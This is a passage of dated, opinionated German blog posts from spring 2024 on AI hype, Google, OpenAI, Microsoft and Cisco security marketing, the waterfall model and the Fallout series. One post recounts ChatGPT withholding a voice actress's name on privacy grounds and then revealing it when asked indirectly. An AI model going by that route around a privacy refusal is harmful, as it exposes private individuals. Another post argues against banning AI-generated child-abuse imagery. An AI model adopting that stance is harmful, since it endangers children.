Als die merkten, was sie getan hatten, haben sie es zu vertuschen versucht und weitergemacht.
Die bittere Lektion ist wie so häufig:
He added: “When we told people, they didn’t believe us. They said this wouldn’t happen in the UK. Today this proves this can happen – and did happen – in the UK.

Thu May 23 2024

[l] Ich mache ja häufiger Vorträge zu brandaktuellen Themen und werde dann kurz vorher von der Realität überholt. Aber so krass wie heute war das noch nie.
Heute habe ich den "Wird uns KI retten"-Vortrag auf der Heise-Security-Tour in Köln gehalten, und ich musste die drei-vier Tage vorher schon mehrfach Sachen noch schnell einbauen.
Und dann kommt am selben Tag noch diese unfassbar großartige Nummer rein.
Google hatte ja mit Reddit einen Deal gemacht, wo sie denen für mehrere Millionen Dollar die KI-Verwertungsrechte an ihren Archiven mit den User-Postings abgekauft haben. Auf Reddit gibt es jetzt, das wisst ihr sicher alle, eine Menge Shitposting. Das kann die Google-"KI" nicht von seriösen Meldungen unterscheiden. Als dann jemand Google fragte, was er beim Pizzabacken gegen abrutschenden Belag tun können, empfahl Googles "KI", er soll eine halbe Tasse Klebstoff dazugeben. Das hatte vor 11 Jahren ein Reddit-User namens "Fucksmith" geshitpostet.
Immerhin wies Googles "KI" auch darauf hin, man möge bitte nichttoxischen Klebstoff nehmen.
Weia.
Du kannst die Realität echt nicht mehr satirisch überspitzen. Die überholt dich noch während du den Satz zuende führst rechts.

Tue May 21 2024

[l] Ein Leser hat ChatGPT gefragt, welche Schauspielerin Sky die Stimme gegeben hat. ChatGPT weicht erstmal aus, meint dann, aus Datenschutzgründe werde das geheim gehalten. Aber auf die Frage, was die noch so gemacht hat, kommt dann der Name und eine Liste. m(
Update: Primärquelle.
Update: OpenAI hat die Chatsitzung noch innerhalb von 24h depubliziert. Wie krass ist DAS denn! Ein Glück haben wir noch den Screenshot.
[l] Im Moment platzt OpenAI ja gerade die Handgranate zwischen den Beinen, dass sie die "Sky"-Stimme von Scarlett Johansson geklaut haben.
Sie haben irgendwann angefragt bei Johansson, die wollte nicht, also haben sie es einfach trotzdem gemacht. Sie sagen, sie hätten eine lebende Frau als Einsprecherin beauftragt und bezahlt, aber wollen nicht sagen, wer das gewesen sein soll.
Und am Tag der Vorstellung des neuen Modells mit der Stimme tweetet Sam Altman, Chef von OpenAI, dann "her" (so heißt der Film, in dem Johansson eine KI-Stimme spielt).
Johansson hat dann ihre Anwälte losgeschickt und OpenAI hat die Stimme schnell weggemacht.
Das beste an der ganzen Nummer fand ich aber einen Forenkommentar, der die Gesamtsituation wunderschön auf den Punkt bringt, finde ich:
Altman wants to be a part of AI regulation in the same way Bankman Fried wanted to be a part of cryptocurrency regulation.
Das ist der richtige Vergleich. Die Tech-Bro-Sams, die persönlichen Profit über alles andere stellen, und gerne die Welt brennen sehen, solange sie dabei genug Kohle einfahren.

Tue May 14 2024

[l] Habt ihr euch auch Sorgen gemacht, dass Firefox als einziger Browser übrig bleibt, in den man sowas wie ein Restvertrauen haben kann?
Keine Sorge, Mozilla ist am Ball.
Firefox sammelt jetzt Daten über Suchanfragen. Natürlich mit voll super total krass anonymisierenden Verfahren, damit weil äh also vertraut uns einfach!1!!
Was kann Firefox mit Daten anfangen, die ordentlich anonymisiert sind? GAR NICHTS.
Kann nicht mal jemand Firefox forken, der kein Geschäftsmodell hat, das auf dem Ausschlachten der Daten der Endanwender hat? Die Linux Foundation oder so!

Fri May 10 2024

[l] Die Politik hat so viele Reporting-Pflichten eingeführt, dass eine der häufigsten Hoffnungen für "KI" ist, dass man die die Reports schreiben lassen kann.
Aktuell: Die Polizei!
Axon—the makers of widely-used police body cameras and tasers (and that also keeps trying to arm drones)—has a new product: AI that will write police reports for officers. Draft One is a generative large language model machine learning system that reportedly takes audio from body-worn cameras and converts it into a narrative police report that police can then edit and submit after an incident.
Ich könnte mir sogar vorstellen, dass das die Gesamtsituation verbessert, wenn das Reporting von "neutraler" "KI" gemacht wird statt vom Polizisten selbst, der wahrscheinlich nur Dinge erwähnen wird, die ihn im Rechte aussehen lassen, als er den schwarzen Jugendlichen erschoss.
Auf der anderen Seite ist in solchen Fällen wahrscheinlich die Bodycam gerade "ausgefallen" oder so, da hilft dann auch "KI" nicht.
Für mich ist das ja immer ein Zeichen von Hilflosigkeit, wenn irgendein inkompetenter Sesselfurzer neue Reporting-Pflichten vorschreibt. Das heißt, die wollen sich mit dem Problem nicht beschäftigen. Komm, Atze, Reporting-Pflichten draufpacken, fertig ist die Laube!
Naja und dann gibt es da natürlich das Trainingsproblem. Womit werden die die "KI" trainieren? Mit existierenden Bodycamaufnahmen und den Reports, die da rauskamen. Die "KI" wird also trainiert, nicht hinzugucken, wenn man im Film einen Kollegen unnötige Gewalt anwenden sieht.

Mon May 6 2024

[l] Ihr habt ja wahrscheinlich gehört, dass Microsoft-CEO Sadja Nadella neulich spontan entschieden hat, dass Security-Überlegungen jetzt doch Teil des Entwicklungsprozesses bei Microsoft werden sollen.
Ich glaube kein Wort.
Vor vielen Jahren hat Bill Gates mal ein vergleichbares Memo herumgeschickt, das dann Dinge ausgelöst hat. An das erinnere ich mich aber als deutlich glaubwürdiger.
Man darf nicht vergessen, dass Nadella selber derjenige war, der die Tester-Ressourcen weggestrichen hat, und Security war Teil von Testing. Das ist also kein Zufall, keine Verkettung unglücklicher Umstände, keine Naturkatastrophe, das war sein aktives, zielgerichtetes, vorsätzliches Handeln. Wenn bei Microsoft Security ausbrechen soll, dann muss aus meiner Sicht erstmal Nadella weg.
Damals lief das so, dass Bill Gates irgendwo gehört wurde, wie er erzählte, er fände XML eigentlich ganz cool, und sofort ließen alle Mitarbeiter alles stehen und liegen und bauten überall XML ein. Microsoft ist halt keine militärische Hierarchie sondern eher so eine Wiese mit lauter Maulwurfhügeln. Zu deren Koordination gibt es dann eine Hierarchie, aber die macht im Wesentlichen nichts. Man raunte sich damals Geschichten zu, dass ein Feature dreimal unabhängig von verschiedenen Teams implementiert wurde, weil es keine koordinierende Führung gab und die nicht miteinander sprachen. Das fiel dann kurz vor dem Shipping auf, und da hat man dann eines weggeschmissen und die anderen beiden ausgeliefert. Soll der Markt entscheiden!1!!
Warum erzähle ich das alles? Erstens damit ihr mal gehört habt, dass ich dem Nadella und seinem Security-Push kein Wort glaube. Ich deute das so, dass die jetzt alle Security Copilot verwenden müssen und alles noch viel beschissener wird.
Anlass für diesen Blogpost war aber eigentlich dieser Artikel über "ZTDNS". ZT wie ... Zero Trust. Zero Trust DNS ist schon als Begriff hirnerweichend dämlich. Zero Trust hat was damit zu tun, wie Server in der Firma sich zu verbinden suchende Clients betrachten. Ob als "der kommt aus unserem IP-Range, der wird schon sauber sein" oder als "das ist wahrscheinlich ein Angreifer, ich will erstmal den Ausweis sehen und danach verschlüsseln wir". DNS ist unverschlüsselt. Bleibt auch nach diesem Modell unverschlüsselt.
Ich habe das jetzt dreimal gelesen, um zu verstehen, was die da eigentlich konkret vorschlagen. Das liest sich wie eine Koks-Party der Marketing-Deppen, wo sie ein paar Mal Stille Post gespielt haben. Da tauchen ein paar Wörter auf, die etwas bedeuten. Aber insgesamt kann ich da gerade keinen Sinn erkennen.
Ungefähr so habe ich das befürchtet, wenn da ein Security-Memo rumgeht, nachdem man alle Leute rausgeekelt hat, die sich damit auskannten. Jetzt spielen da ein paar Theaterfreunde lustige Handbewegungen und dann behauptet man dem Kunden gegenüber einfach, man habe jetzt Security gemacht.
Ich glaube, was sie ursprünglich meinten, war: Hey, wir packen einfach ins Active Directory, welche Hosts du sehen kannst, und die anderen filtern wir jetzt nicht nur per Firewall sondern der DNS gibt dir gar nicht erst deren IP. Hat das einen Schutzeffekt, der über Firewalling hinausgeht? Nein. Macht das andere Dinge kaputt? Natürlich!
Ich persönlich begrüße das, wenn Windows sich weiter ins Abseits schießt. Das ist ja jetzt schon nur noch eine Werbungs-Auslieferungs-Plattform mit ein paar Member Berries, die die Leute an ältere Windows-Versionen erinnern, mit denen sie groß geworden sind.
Oh, und eine Datenabgreifplattform, natürlich.
IT RUBS THE MICROSOFT ACCOUNT ON ITS SKIN OR IT GETS THE HOSE AGAIN!
Update: Eigentlich ein Fall für Radio Eriwan. Microsoft hat ein tolles Zero Trust DNS für Security! Im Prinzip ja, ist nur weder Zero Trust noch Security noch DNS. Aber der Rest ist voll geil!!
Update: Ein Kumpel meint, das soll dann alles verschlüsselt ablaufen, über DoT oder DoH. Ich las das als optional. Vielleicht irrte ich und das soll Zwang werden. Halte ich trotzdem nichts von. Die Komplexität von DoT und DoH ist Größenordnungen über der von DNS. Da werden also mit Sicherheit Lücken drin sein, und wenn eine Sicherheitslücke in OpenSSL gefunden wird (oder halt einer anderen TLS-Implementation), dann will man die bitte upgraden können, ohne dafür die verwundbare TLS-Implementation zu brauchen.

Sat Apr 27 2024

[l] Wie schlimm ist die Lage? So schlimm: Microsoft wird auf Earnings Calls von Analysten auf die beschissene Security ihrer Produkte angesprochen.
Wie ernst sie das nehmen? Seht selbst:
"Security underpins every layer of the tech stack and it's our No. 1 priority," Nadella said on a conference call with analysts. "We are doubling down on this very important work, putting security above all else, before all other features and investments."
Das ist natürlich eine hanebüchene Lüge. Windows fällt in den letzten Jahren vor allem dadurch auf, dass es noch mehr Überwachung macht und noch mehr Werbung einblendet und einen zum Verwenden von noch mehr Microsoft-Clouddienste überreden will, damit noch mehr Daten abgreifbar sind.
Das letzte Mal, als Security bei Microsoft eine Rolle gespielt hat, war als Bill Gates noch Memos rumgemailt hat, dass er XML geil findet.
Update: Wo wir gerade bei Microsoft und Security waren: Hier ist noch eine Story dazu, wo sie schreiben:
The United States government kept buying and using Microsoft products, and senior officials refused to publicly rebuke the tech giant. It was another reminder of how insulated Microsoft has become from virtually any government accountability, even as the Biden administration vows to make powerful tech firms take more responsibility for America’s cyberdefense.
So sieht's aus. Es ist so schlimm, dass schon peinliche Fragen fallen wie:
Asked about experts’ arguments that Microsoft’s strategy of profiting off of cybersecurity is incompatible with a security-first mindset, Faehl says, “We would disagree with that characterization.”
Die Einschläge kommen näher! Wenn man doch nur ... wie nennt man das sonst im Leben? Haftung? Ja, Haftung! Wenn man doch nur Haftung für Software machen könnte!1!!

Fri Apr 26 2024

[l] Wieso ist Google eigentlich so am Abschmieren? Stellt sich raus: Das kann man auf einen Mann zurückführen, der vorher bei McKinsey "gearbeitet" hat.
Ich mag ja das Gefühl, wenn sich meine Vorurteile bestätigen.
Update: Wobei natürlich nicht klar ist, dass sich das auf deren Profit auswirkt. Der ist gerade überraschend hoch ausgefallen. So hoch, dass Alphabet erstmals Dividende zahlt.
Die haben halt nicht völlig unrecht. Qualität ist teuer. Wieso für Qualität zahlen, wenn du auch Lock-In machen kannst?
Update: Ich schreib's sicherheitshalber nochmal explizit hin. Es ist nicht so, dass die Suche schlechter wird, und die Profite darunter leiden. Im Gegenteil haben sie die Suche absichtlich schlechter gemacht, um kurzfristig die Profite zu befeuern. Das ist kein Unfall, das war Absicht.

Mon Apr 22 2024

[l] Sex offender banned from using AI tools in landmark UK case.
Das muss mir bei Gelegenheit auch mal jemand erklären, welches Kind wir da konkret schützen, indem wir gemalte oder "KI"-generierte Bilder von Kindesmissbrauch verbieten.
Mir persönlich wäre das Größenordnungen lieber, wenn sich so jemand an sowas abreagiert, als wenn der echte Kinder entführt und missbraucht.
Oder glaubt ernsthaft jemand, dass sich dessen unerwünschte Bedürfnisse von selbst legen, wenn er nur ne Weile was anderes macht?

Fri Apr 19 2024

[l] Google hat aufgegeben und schickt jetzt alle zu Reddit.
Der Lacher ist, wie es dazu kam. Sie haben beobachtet, dass die Leute häufig erst "foo" googeln und dann "foo reddit". Also haben sie sich gedacht, hey, wenn die Leute eh zu Reddit wollen, dann geben wir ihnen halt, was sie wollen.
Aber warum haben die Leute das gemacht? Weil die Suchfunktion von Reddit so legendär beschissen ist, dass sie niemand mehr als einmal benutzt und alle lieber zu Google rennen.
Für Reddit ist dieses strukturelle Versagen natürlich super jetzt. Die sahnen jetzt den ganzen Google-Traffic ab, da freuen sich die Aktionäre.
Was lernen wir aus der Geschichte? Baut eine beschissene Suchfunktion!1!!
Für den Rest von uns ist das natürlich Scheiße, denn die SEO-Arschlöcher sehen das ja und werden jetzt alle noch krasser auf Reddit rumspammen.
Update: Faszinierend! Ich habe jetzt mehrere Leser in der Inbox, die meinen, das sei nur die halbe Erklärung. Die Reddit-Suchfunktion musste so Scheiße sein, dass man zu Google geht, aber dann musste Google auch so Scheiße werden, dass man nach Reddit fragt. Leute fragen offenbar tatsächlich explizit nach Reddit, weil man dann Threads mit wenigstens Resten von menschlicher Mitarbeit kriegt statt SEO-Müll von "KI"-Contentfarmen.
Auf die Idee wäre ich nie gekommen, wenn die Suche nach foo scheitert, da ein reddit anzuhängen, damit es ... *besser* wird. Wat!? Aber scheint ja zu funktionieren, sonst würden es die Leute nicht machen.

Thu Apr 18 2024

[l] Ich reg mich ja seit Jahren still über "-native" auf. "Digital native" war Bullshit in Tüten (als ob jemand, der damit aufwächst, automatisch ein tieferes Verständnis entwickelt!), dann kam "Cloud Native", das war Bullshit in Jutetaschen (reiner Marketingscheiß, der rausquillt und schlecht rauswaschbar ist).
Eine ähnliche Kategorie von "da krieg ich Gewaltfantasien"-Neusprech ist "-scale". Was die alle immer rumgefurzt haben, wie geil ihr Scheiß skalieren würde! Und dann guckst du mal vorbei und wartest 20 Sekunden auf das Laden der Homepage.
Und jetzt ist alles "internet scale" oder zumindest "cloud scale", man sagt nicht mehr "Cloud-Drückerkolonne" sondern "Hyperscaler" (das einzige, was da skaliert, sind die Rechnungen). Furchtbar.
Höchste Zeit also, dass sich ein Depp findet, der mit "AI-native" und "AI-scale" Werbung macht.
Was soll ich euch sagen? Cisco liefert! Ja, DAS Cisco, das mit den ständigen apokalyptischen Sicherheitslücken. Die mit den Dutzenden von versehentlich hart einkodierten Admin-Account-Passwörtern. DIE. Die erzählen uns jetzt nicht nur was von Security sondern machen gleich noch die volle Familienpackung "AI" dran. Vorsicht: Wenn man irgendwas von irgendwas versteht, kriegt man von der Lektüre direkt Ganzkörper-Juckreiz. Das Produkt heißt "Hypershield". Wie Hypeshield aber mit r. Damit man assoziiert, es sei für Hyperscaler (und damit BESTIMMT SICHER GUT GENUG FÜR UNS HIER).
Eine Sache glaube ich ihnen. Dass die Presseerklärung direkt aus einer "KI" fiel. Das ist alles so falsch, dass nicht mal das Gegenteil stimmt.
Auf der anderen Seite kann man Punkte für alle Schlangenöl-Tropes in der IT-Security-Werbung vergeben. Das checkt alle Boxen.
1. "Developed for hyperscale". Check.
2. Schützt ALLES for ALLEN Angriffen. Check.
3. Revolutionär! check.
4. "enables security enforcement to be placed everywhere". Check.
5. "can even turn every network port into a high-performance security enforcement point". Check.
Aber Fefe, wie machen die denn das? So tolle Skalierbarkeit? Und "KI"? Beides zusammen! Das geht nun wirklich nicht!
DOCH! Das geht! In der unseriösen Werbung einer anderen Firma: Nvidia. Ihr seht wahrscheinlich schon kommen, was als nächstes passiert:
Cisco [blahsülz] with NVIDIA, is committed to building and optimizing AI-native security solutions to protect and scale the data centers of tomorrow.
Und schwupps, mit einer kleinen Handbewegung, ist was eben noch ein Nachteil war (nämlich dass hier ohne Domain Knowledge eine "KI" Dinge halluziniert, die darauf trainiert ist, dass das plausibel aussieht, nicht dass es funktioniert) ein Vorteil! Weil, äh, "AI-native"!!1!
Ja aber Moment, Fefe, da stand ja noch gar nicht "empower"! Ohne "empower" geht sowas doch gar nicht!!
"AI has the potential to empower the world's 8 billion people to have the same impact as 80 billion.
Das hingegen finde ich ein tolles Zitat. Er sagt hier also: Wenn die Leute alle "KI" machen, dann werden sie zehnmal so viel Ressourcen verbrauchen, ohne einen Vorteil daraus zu ziehen. Glaubt mir, wenn das Vorteile brächte, hätte er die hier erwähnt.
Wo wir gerade bei Warnungen waren:
The power of Cisco Hypershield is that it can put security anywhere you need it – in software, in a server, or in the future even in a network switch.
Du brauchst dann halt in jedem Ethernetport eine Nvidia-GPU. Das wird das Power-Budget geringfügig senken, das für tatsächliches Computing übrig bleibt in einem Data Center, aber für Nvidias Aktienkurs wird es großartig werden!
When you have a distributed system that could include hundreds of thousands of enforcement points, simplified management is mission critical. And we need to be orders-of-magnitude more autonomous, at an orders-of-magnitude lower cost
Beachtet das "autonomous" her. Eine "KI", die keiner versteht, weil sie nicht programmiert sondern trainiert wurde, soll autonome Entscheidungen darüber treffen, welche Netzwerkpakete erlaubt sind und welche nicht. Oh und wie immer bei "KI" gibt es auch kein Debugging, nur "nach-trainieren", was dann andere Stellen kaputtmacht. Das wird ja eine tolle Zukunft!
So, jetzt kommen wir zum technischen Teil. Weiter unten, damit er die Deppen nicht mit Fakten verwirrt.
AI-Native: Built and designed from the start to be autonomous and predictive, Hypershield manages itself once it earns trust, making a hyper-distributed approach at scale possible.
Cisco sagt also selbst, dass man dem nicht trauen kann, bis es sich Vertrauen erarbeitet hat. Wenn wir es hier mit denkenden Kunden zu tun hätten, wäre die logische Folge, dass man das nicht einsetzen kann. "manages itself" sollte natürlich auch alle Alarmlampen angehen lassen, genau wie "hyper-distributed" und "at scale", aber vermutlich nicht bei Leuten, die Cisco kaufen. Das ist eine Vorselektion vom unteren Rand des Spektrums.
Cloud-Native: Hypershield is built on open source eBPF, the default mechanism for connecting and protecting cloud-native workloads in the hyperscale cloud. Cisco acquired the leading provider of eBPF for enterprises, Isovalent, earlier this month.
Langsam zeichnet sich ein Bild ab. Irgendein Sprallo bei Cisco sah die Firma mit der Überflüssigkeit konfrontiert, die aus Software Defined Networking einhergeht (ach, man kann Switches in Software machen? Man braucht gar keine Hardware mehr, von Cisco oder sonstwem?), dann haben sie schnell einen Panikkauf von einer eBPF-Klitsche gemacht und mit einem Hype-Überperformer (am Aktienmarkt, nicht bei den Produkten) geredet, also Nvidia, und sagen jetzt den Investoren: We heard you like AI! We put Nvidia in you eBPF so you can hallucinate while you kernel panic!
Ich ruf gleich mal den Notarzt. Wenn DAS keinen Herzinfarkt oder Schlaganfall auslöst, dann bin ich möglicherweise schon tot und werde hier gerade bloß von einer "KI" weitersimuliert. Das kann niemand überleben, der mehr als zwei Hirnzellen übrig hat.

Wed Apr 17 2024

[l] Ich habe den Eindruck, dass viele von euch gar nicht wussten, was ein Steelman ist. Daher erkläre ich das mal kurz.
Ein Strohmann ist eine unfaire argumentative Taktik, wo du ein Zerrbild der Gegenseite konstruierst, das sich leichter kritisieren lässt, weil es eben nicht das ist, was die Gegenseite tatsächlich gesagt hat.
Das kann auch aus Versehen passieren. Nehmen wir an, du hast eine Debatte zwischen zwei Leuten, der eine vertritt A und der andere vertritt B. Für viele Leute ist da das Hauptproblem, dass sie annehmen, die Details seien alle grundsätzlich bekannt, d.h. die vertreten dann nicht alle Punkte ihrer Seite, sondern sie betonen die Punkte, die aus ihrer Sicht die größten Vorteile sind. Wenn der Gegenüber nicht so tief drin steckt, kann es sein, dass es zu Missverständnissen kommt.
Daher gibt es die Strategie des Steelman, sozusagen das Gegenteil des Strohmanns. Dann machst du die Debatte so, dass beide Seiten erstmal ihre These vorstellen und vertreten, und als nächsten Schritt muss jede Seite die Argumente der Gegenseite bestmöglich vortragen, als wolle er jemanden von ihrer Richtigkeit überzeugen.
Damit erreicht man zwei Dinge. Erstens merkt man schnell, ob die Leute eigentlich über dasselbe Problem reden, und ob man noch Dinge erklären muss, und zweitens sorgt man dafür, dass das Publikum die Argumente für beide Seiten auch aus der Perspektive von jemandem gehört hat, der nicht eh "schon immer" die Seite vertritt und vielleicht betriebsblind ist.
Wenn ich hier also sage, dass man mal Wasserfall als Steelman machen sollte, dann heißt das nicht, dass ich Wasserfall voll geil finde und ihr alle Wasserfall machen solltet. Das heißt, dass ich erwarte, dass Agile-Leute beim Wasserfall-Kritisieren dafür Sorge tragen, dass sie ersten tatsächlich das Wasserfall-Modell kritisieren und nicht irgendein Zerrbild davon, und zweiten dass das Publikum auch ordentlich informiert wird, was das Wasserfall-Modell eigentlich ist, nicht nur dass der Vortragende es doof findet.
Meine Vermutung ist nämlich, dass in der Praxis Agile nicht gemacht wird, weil es "objektiv besser" als Wasserfall funktioniert, sondern weil alle anderen agile machen, also muss ja was dran sein und wir machen das jetzt lieber auch.

Tue Apr 16 2024

[l] Ich habe in meiner Karriere in Hunderten von Vorträgen gesessen, und gefühlt die Hälfte davon haben sich rituell und performativ am Wasserfallmodell abgearbeitet.
Wir brauchen glaube ich mal einen Steelman-Vortrag zum Wasserfall. Ein Vortrag, der dem Publikum ernsthaft zu verkaufen versucht, wieso man das machen sollte.
Ich finde das ja generell sehr abstoßend, wenn Leute alle performativ gegen irgendwas sind, weil alle anderen auch dagegen sind. Am besten etwas, das jahrzehntelang Stand der Technik war, und von den erfolgreichsten Organisationen seiner Zeit verwendet wurde. Eine Methode, ohne die wir keine Mondlandung und keine Computer hätten.
Ich verstehe ja, dass die Entwickler das alle unsexy finden. Das Modell hätte auch versagt, wenn das nicht so wäre. Denn das Wasserfallmodell kommt halt aus dem Management und versucht, Entwickler möglichst austauschbar (und billig!) zu halten. Wasserfall versucht das Fordsche Fließband-Konzept auf Softwareentwicklung anzuwenden.
Die Entwickler sollen möglichst wenig Verantwortung übergeben kriegen, und bitte keine Entscheidungen treffen, die sich später rächen können. KLAR finde ich als Entwickler das scheiße! Ich möchte gerne eine Schneeflocke sein, einzigartig und wertgeschätzt für meine großartigen Fähigkeiten.
Wir sind ja inzwischen sogar noch viel weiter. Softwareentwickler nehmen die Situation regelmäßig so wahr, dass sie nach einem Software-Projekt mehr Domain Knowledge haben als der Kunde, für den sie die Software schreiben!
Softwareentwickler halten sich genau so gerne für Gott wie andere Diziplinen!
Für den Kunden (und für die Firma, die mich angestellt hat!) ist es aber besser, wenn der Entwickler ein Rädchen im Getriebe ist, dessen Fähigkeiten sich darauf beschränken, sich zu drehen. Und zwar so schnell und in die Richtung, die vom Domain Expert vorgegeben wird. Das war damals eine separate Berufsbezeichnung, nannte sich Softwarearchitekt. Heute ist Softwarearchitekt bloß ein Pay Grade in vielen Firmen, wo man halt nach soundsovielen Jahren hinbefördert wird als Entwickler.
Genau wie wir mit Devops die Ops-Leute abgeschafft haben, und mit DevSecOps die Security-Leute, und mit Agile die Tester, genau so gab es bei Wasserfall noch Architekten.
Genau wie es sich bei DevOps herausgestellt hat, dass du nicht einfach die Entwickler nebenher Ops machen lassen kannst, und das dann insgesamt billiger wird, genau wie sich bei DevSecOps herausgestellt hat, dass du nicht einfach Entwickler auch Security machen lassen kannst, und dann wird das billiger oder besser, genauso hat sich nach der Wasserfall-Abschaffung herausgestellt, dass nicht jeder "Entwickler" das Zeug zum Softwarearchitekten hat. Aber die Entwicklergehälter sind halt entsprechend hochgegangen, daher ist das heute normal, dann halt auch Architektur zu erwarten von denen.
Typische Ausreden gegen das Wasserfallmodell sind "Wir haben gar keine Domain Experts". Ich halte das für Bias von Entwicklern, die trotzdem das Projekt machen und Geld verdienen wollen. Klar sagen die dann nicht, was sie sagen sollten, nämlich: Dann können wir diese Software nicht seriös anbieten. Die sagen lieber "pass uff, Atze, wir machen das agile. Die Software ist fertig, wenn ihr kein Geld mehr nachschießen könnt. Wenn ihr immer schön mithelft, wird das vielleicht was. Vielleicht auch nicht."
Das sind Zustände wie beim Berliner Großflughafen! Da schäme ich mich für meine Profession, wenn da solche Marktteilnehmer rumlaufen!
Inzwischen hat sich das aber nicht nur durchgesetzt, sondern es hat die Gesamtsituation, dass Software halt nie fertig ist, immer teurer wird, und das Problem nicht löst, so normalisiert, dass die Leute das für normal halten.
Die Leute haben nicht Wasserfall gemacht, weil sie böse Menschen waren, sondern weil das Modell Dinge versprochen (und zumindest teilweise eingelöst!) hat, die attraktiv waren.
Früher hatte man auch Fachkräftemangel. Die Antwort war: Dann nehmen wir die Leute, die wir kriegen können, für die Architektur und das Pflichtenheft und das Domain Knowledge, und das Eintippen des Codes können halbgeschulte bessere Tippkräfte machen.
Heute haben wir Fachkräftemangel, und die Antwort ist: Wir suchen alle nach "Full Stack Engineers" mit 20 Jahren Kubernetes-Erfahrung, die seit 50 Jahren Java programmieren, aber höchstens 25 Jahre alt sind.
Klar funktioniert das nicht, aber wenigstens machen wir keinen Wasserfall mehr!!1!
Update: Jetzt werde ich gerade unsicher, ob ich Wasserfall vielleicht falsch verstanden habe. Ein Leser meint (mit Verweis auf Wikipedia), dass es da keine Iterationen gibt. Gibt es natürlich trotzdem, auch wenn du die dann "Folgeprojekt" nennst. Den Einwand wische ich also mal eben zur Seite *hust*
Heutzutage geht das schon als Wasserfall durch, wenn du vor dem Loshacken ein Pflichtenheft gemacht hast.
Das Originalpaper von WW Royce aus dem Jahre 1970 ist übrigens ganz witzig. Mit so Krachern wie
Many additional development steps are required, none contribute as directly to the final product as analysis and coding, and all drive up the development costs. Customer personnel typically would rather not pay for them, and development personnel would rather not implement them. The prime function of management is to sell these concepts to both groups and then enforce compliance on the part of development personnel.
Wasserfall war also ursprünglich nicht "so müsst ihr das machen" sondern eher "diese Schritte sind auch noch nötig, sonst wird das nichts". Überhaupt kommt viel der Dogmatik in der Computerei aus neuerer Zeit. Früher war man da deutlich experimentierfreudiger. Deshalb haben die Leute damals ja auch Dinge hingekriegt, während wir heute hauptsächlich heiße Luft und kaputte Software produzieren und nach "KI" schreien, um uns zu retten.
Royce nimmt die Kritik sogar teilweise selbst vorweg, indem er schreibt, dass das Testen erst nach der Implementation eigentlich zu spät ist und ein teures Redesign nach sich ziehen kann. Nicht nur das: Royces Modell sah Feedback entgegen der "Flussrichtung" des Wasserfalls vor (Figure 4), sowie Prototyping, im Gegensatz zum Vorgängermodell von Benington, das da starrer war.
Hier ist noch ein wunderbarer Abschnitt:
At this point it is appropriate to raise the issue of - "how much documentation?" My own view is "quite a lot;" certainly more than most programmers, analysts, or program designers are willing to do if left to their own devices. The first rule of managing software development is ruthless enforcement of documentation requirements.
Das ist kaum der verstaubte Antichrist der Softwareentwicklung, den die Agile-Leute da als Strohmann verbrennen.
After documentation, the second most important criterion for success revolves around whether the product is totally original. If the computer program in question is being developed for the first time, arrange matters so that the version finally delivered to the customer for operational deployment is actually the second version insofar as critical design/operations areas are concerned
Von wegen keine Iterationen!
For some reason what a software design is going to do is subject to wide interpretation even after previous agreement. It is important to involve the customer i n a formal way so that he has committed himself at earlier points before final delivery. To give the contractor free rein between requirement definition and operation is inviting trouble.
Von wegen "der Kunde wird nicht involviert". Wikipedia liegt falsch und die Agile-Leute sind Lügner.

Fri Apr 12 2024

[l] Die Fallout-Serie kann ich übrigens empfehlen.
Ich habe mehrere tausend Stunden in Fallout 3, New Vegas und 4 verbracht und würde mich als Franchise-Fan bezeichnen. Bei den älteren Fallouts sind keine Zeitstatistiken verfügbar.
Das Set-Design alleine ist wirklich grandios. Es wirkt alles nach Props, nicht nach CGI. Klar gibt es auch CGI, und besonders die Monster haben dann eher so Doctor-Who-Qualitätsniveau (bis auf die Ghouls, die sehen gut aus), aber die Vaults? Die Kleidung? Die ganzen kleinen Details (Sugar Bombs! Yumyum Deviled Eggs! Der Trinkwasserbehälter!) sehen alle prächtig aus.
Es ist keine super ernst gemeinte Serie, klar, und so sind auch viele Details einfach auf einen billigen Lacher ausgerichtet. Die Brotherhood of Steel lässt ihre Squires für die Knights in der Power Armor geradezu grotesk übergroße Säcke mit Equipment herumtragen. Dabei weiß doch jeder: Die Power Armor erhöht die Stärke und damit das tragbare Gewicht massiv!1!!
Einige Sachen sind auch echt bescheuert, z.B. dass sie da eine Nonbinary-Figur ausgerechnet bei der Brotherhood of Steel einbauen mussten, die im Spiel eine faschistische Fraktion aus Alleshassern sind, die schon mal einen Genozid an Ghouls durchführen. Das ist die letzte Fraktion, die für Inklusivität stehen würde in den Spielen. Aber egal, kann man wegignorieren.
Unter dem Strich kann man das aber gut gucken. Leute, die das grüne-braune Farbspektrum von Fallout 3 vermissen, irren übrigens. Guckt euch mal Bilder von der Gegend um Tschernobyl an. Da ist kein Grünschleier in der Luft. Jedenfalls nicht vom Fallout. :-)
Ich persönlich habe mich über Fred Armisons Cameo kurz vor Ende gefreut, der sich eine lange Liste an Cameos bekannter Gesichter einreiht. Walton Goggins räumt wie üblich ab, klar. Die anderen beiden Protagonisten können da wenig gegen anstinken, aber sie schlagen sich auch ganz gut fand ich.
Die Serie über wirkt das Mysterium von Vault 33 ein bisschen farblos, aber die Auflösung am Ende hat einen schönen Payoff.
Ich hatte mir wirklich Sorgen gemacht, dass das Scheiße wird. Immerhin steht Todd Howard als Executive Producer in den Credits. Aber jetzt kann ich sagen: Das ist das erste Todd Howard-Projekt ohne Abstürze, ohne Day 1 Patches, ohne unofficial Patch der Community, weil Bethesda ihre Bugs nicht fixt. Grafik-Glitches gab es auch keine. Es sei ihm gegönnt auf seine alten Tage. War nicht ALLES Scheiße, was er angefasst hat!
Es muss aber geschmerzt haben, dass zwar optisch alles wie Fallout 4 aussieht, aber die Lore komplett auf Fallout 3 und New Vegas fußt. Speziell New Vegas räumt absolut überproportional ab. War ja auch das beste Spiel in der Serie. Aber war halt nicht von Bethesda sondern von Obsidian Entertainment, d.h. ohne Todd Howard.

Thu Apr 4 2024

[l] Lesetipp: The Verge: Welchen Drucker soll man kaufen.
Ein Kunstwerk! Wunderbar!
Den Inhalt kann ich mal vorwegnehmen: Was immer gerade von Brother im Sonderangebot ist. Das ist seit Jahren ein Running Gag in der IT, dass sich die Druckerhersteller alle gegenseitig mit ihrer Enshittification-Spirale unkaufbar gemacht haben, bis auf Brother, die zu bräsig dafür waren und deren Drucker man daher jetzt als einzige noch kaufen kann.
Aber das ist nicht der Punkt von dem Artikel.
Der Punkt ist, dass er genau den Artikel letztes Jahr schonmal geschrieben hat, aber den findet man bei Google nicht mehr, weil jetzt lauter "KI"-Contentfarmen SEO machen und echte Reviews verdrängt haben.
